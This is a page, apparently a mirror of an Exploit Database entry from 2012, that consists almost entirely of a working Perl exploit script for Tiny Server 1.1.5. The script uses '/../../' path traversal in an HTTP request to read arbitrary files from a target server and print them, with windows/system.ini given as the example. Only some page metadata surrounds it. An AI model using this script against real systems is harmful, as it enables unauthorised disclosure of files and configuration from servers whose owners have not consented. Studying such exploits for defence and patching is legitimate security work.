Tiny Server 1.1.5 – Arbitrary File Disclosure

• Exploit Database
• 133 阅读

• 作者： KaHPeSeSe
  日期： 2012-03-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18610/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  #!/usr/bin/perl -w #Title: Tiny Server v1.1.5 Arbitrary File Disclosure Exploit #Author : KaHPeSeSe #Test : PERFECT XP PC1 / SP3 #Date : 15/03/2012 #Thanks : exploit-db.com   use LWP::Simple; use LWP::UserAgent;   system(&apos;color&apos;,&apos;A&apos;); system(&apos;cls&apos;); print "\n\t____________________________________________________________________\n"; print "\n\t....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit .......\n"; print "\n\t....... Founded and Exploited by KaHPeSeSe .......\n"; print "\n\t____________________________________________________________________\n\n";   if(@ARGV < 3) { print "[-] Error!\n"; print "[-] Look to example\n\n"; &help; exit(); } sub help() { print "[+] Howto : perl $0 IP Port File\n"; print "[+] Example : perl $0 192.168.1.2 80 windows/system.ini\n"; } ($TargetIP, $Port, $File) = @ARGV; print("Connet to Server.... \n"); sleep(2); $path="/../../"; my $link = "http://" . $TargetIP . ":" . $Port . $path . $File; print("Connected\n"); sleep(2); print("Waiting for moment\n"); sleep(1); print("Done! Reading $File...\n"); sleep(3); $ourfile=get $link; if($ourfile) { print("\n\n____________________________________________________\n\n"); print("$ourfile \n\n"); print("_____________________________________________________\n\n"); } else { print("_____________________________________________________\n\n"); print(" Not Found !!!\n\n"); print("_____________________________________________________\n\n"); exit; }